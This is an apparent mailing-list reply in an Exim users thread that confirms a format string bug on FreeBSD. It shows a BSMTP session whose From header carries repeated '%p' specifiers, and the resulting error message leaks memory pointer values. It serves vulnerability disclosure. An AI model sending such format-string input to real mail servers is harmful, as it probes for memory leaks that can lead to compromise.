Re: [Exim] [Security-l] lil' exim format bug (fwd)

Góra strony
Autor: Chris Knipe
Dla: exim-users
Temat: Re: [Exim] [Security-l] lil' exim format bug (fwd)
Also on FreeBSD...

bash-2.03$ exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x80ce8c00x8054af90x80ce2380x80ce2380x80cf0800x28233db70x282528480xf0x00x80ce53c
Transaction started in line 0
Error detected in line 5
An error was detected while processing a file of BSMTP input.
The error message was:

550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x80ce8c00x8054af90x80ce2380x80ce2380x80cf0800x28233db70x282528480xf0x00x80ce53c

The SMTP transaction started in line 0.
The error was detected in line 5.